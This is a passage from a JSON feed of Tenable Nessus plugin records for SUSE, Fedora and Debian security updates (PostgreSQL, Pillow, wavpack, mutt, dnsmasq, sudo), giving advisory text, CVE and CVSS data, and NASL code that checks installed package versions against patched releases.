preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libecpg6-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libecpg6-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpq5-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpq5-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-contrib-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-contrib-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.10\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-devel-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-devel-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plperl-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plperl-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plpython-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plpython-debuginfo-13.1-5.3.15\")) flag++;\nif 
(rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-pltcl-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-pltcl-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-devel-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-server-devel-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-test-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpq5-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpq5-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.10\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"postgresql13-test-13.1-5.3.15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql13\");\n}\n", "cvss": {"score": 7.6, 
"vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T10:34:03", "description": "Backport fixes for CVE-2020-35653, CVE-2020-35654, CVE-2020-35655.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : mingw-python-pillow / python-pillow (2021-a8ddc1ce70)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35654", "CVE-2020-35655", "CVE-2020-35653"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-pillow", "p-cpe:/a:fedoraproject:fedora:mingw-python-pillow", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2021-A8DDC1CE70.NASL", "href": "https://www.tenable.com/plugins/nessus/145235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-a8ddc1ce70.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145235);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-35653\", \"CVE-2020-35654\", \"CVE-2020-35655\");\n script_xref(name:\"FEDORA\", value:\"2021-a8ddc1ce70\");\n\n script_name(english:\"Fedora 33 : mingw-python-pillow / python-pillow (2021-a8ddc1ce70)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Backport fixes for CVE-2020-35653, CVE-2020-35654, CVE-2020-35655.\n\nNote that Tenable Network Security has 
extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-a8ddc1ce70\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected mingw-python-pillow and / or python-pillow\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"mingw-python-pillow-7.2.0-3.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"python-pillow-7.2.0-3.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-python-pillow / python-pillow\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-22T10:34:00", "description": " - wavpack-5.4.0 is available\n\n - CVE-2020-35738 wavpack: out-of-bounds write in\n WavpackPackSamples function in pack_utils.c [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update 
system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 6.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : wavpack (2021-5c83efb61c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35738"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:wavpack"], "id": "FEDORA_2021-5C83EFB61C.NASL", "href": "https://www.tenable.com/plugins/nessus/145240", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-5c83efb61c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145240);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-35738\");\n script_xref(name:\"FEDORA\", value:\"2021-5c83efb61c\");\n\n script_name(english:\"Fedora 33 : wavpack (2021-5c83efb61c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\" - wavpack-5.4.0 is available\n\n - CVE-2020-35738 wavpack: out-of-bounds write in\n WavpackPackSamples function in pack_utils.c [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-5c83efb61c\"\n );\n script_set_attribute(\n attribute:\"solution\",\n 
value:\"Update the affected wavpack package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wavpack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"wavpack-5.4.0-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wavpack\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-22T09:38:35", "description": "rfc822.c in Mutt through 2.0.4 allows remote attackers to cause a\ndenial of service (mailbox unavailability) by sending email messages\nwith sequences of semicolon characters in RFC822 address fields (aka\nterminators of empty groups).\n\nA small email message from the attacker can cause large memory\nconsumption, and the victim may then be unable to see email messages\nfrom other persons.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.7.2-1+deb9u5.\n\nWe recommend that you upgrade your mutt packages.\n\nFor the detailed security status of mutt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/mutt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 1, "cvss3": {}, "published": "2021-01-21T00:00:00", "title": "Debian DLA-2529-1 : mutt security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3181"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mutt", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2529.NASL", "href": "https://www.tenable.com/plugins/nessus/145237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2529-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145237);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2021-3181\");\n\n script_name(english:\"Debian DLA-2529-1 : mutt security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"rfc822.c in Mutt through 2.0.4 allows remote attackers to cause a\ndenial of service (mailbox unavailability) by sending email messages\nwith sequences of semicolon characters in RFC822 address fields (aka\nterminators of empty groups).\n\nA small email message from the attacker can cause large memory\nconsumption, and the victim may then be unable to see email messages\nfrom other persons.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.7.2-1+deb9u5.\n\nWe recommend that you upgrade your mutt packages.\n\nFor the detailed security status of mutt please refer to its security\ntracker page at: 
https://security-tracker.debian.org/tracker/mutt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/01/msg00017.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/mutt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/mutt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected mutt package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mutt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"mutt\", reference:\"1.7.2-1+deb9u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T10:34:01", "description": "[Dnspooq](https://www.jsof-tech.com/disclosures/dnspooq/) security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {}, "published": "2021-01-21T00:00:00", "title": "Fedora 33 : dnsmasq (2021-84440e87ba)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25684", "CVE-2020-25687", "CVE-2020-25685", "CVE-2020-25681", "CVE-2020-25683", "CVE-2020-25682", "CVE-2020-25686"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dnsmasq", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2021-84440E87BA.NASL", "href": "https://www.tenable.com/plugins/nessus/145241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2021-84440e87ba.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145241);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25681\", \"CVE-2020-25682\", \"CVE-2020-25683\", \"CVE-2020-25684\", \"CVE-2020-25685\", \"CVE-2020-25686\", \"CVE-2020-25687\");\n script_xref(name:\"FEDORA\", value:\"2021-84440e87ba\");\n\n script_name(english:\"Fedora 33 : dnsmasq (2021-84440e87ba)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"[Dnspooq](https://www.jsof-tech.com/disclosures/dnspooq/) security\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-84440e87ba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.jsof-tech.com/disclosures/dnspooq/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected dnsmasq package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"dnsmasq-2.83-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T10:33:59", "description": "Rebase to 1.9.5p1\n\n - updated sudo url Resolves: rhbz#1902758\n\n - enabled python plugin as a subpackage Resolves:\n rhbz#1909299\n\n - fixed double free in sss_to_sudoers Resolves:\n rhbz#1885874\n\n - fixed CVE-2021-23239 sudo: 
possible directory existence\n test due to race condition in sudoedit Resolves:\n rhbz#1915055\n\n - fixed CVE-2021-23240 sudo: symbolic link attack in\n SELinux-enabled sudoedit Resolves: rhbz#1915054\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 1, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "Fedora 32 : sudo (2021-234d14bfcc)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23239", "CVE-2021-23240"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:sudo", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2021-234D14BFCC.NASL", "href": "https://www.tenable.com/plugins/nessus/145238", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2021-234d14bfcc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145238);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2021-23239\", \"CVE-2021-23240\");\n script_xref(name:\"FEDORA\", value:\"2021-234d14bfcc\");\n\n script_name(english:\"Fedora 32 : sudo (2021-234d14bfcc)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Rebase to 1.9.5p1\n\n - updated sudo url Resolves: rhbz#1902758\n\n - enabled python plugin as a subpackage Resolves:\n rhbz#1909299\n\n - fixed double free in sss_to_sudoers Resolves:\n rhbz#1885874\n\n - fixed CVE-2021-23239 sudo: possible 
directory existence\n test due to race condition in sudoedit Resolves:\n rhbz#1915055\n\n - fixed CVE-2021-23240 sudo: symbolic link attack in\n SELinux-enabled sudoedit Resolves: rhbz#1915054\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-234d14bfcc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 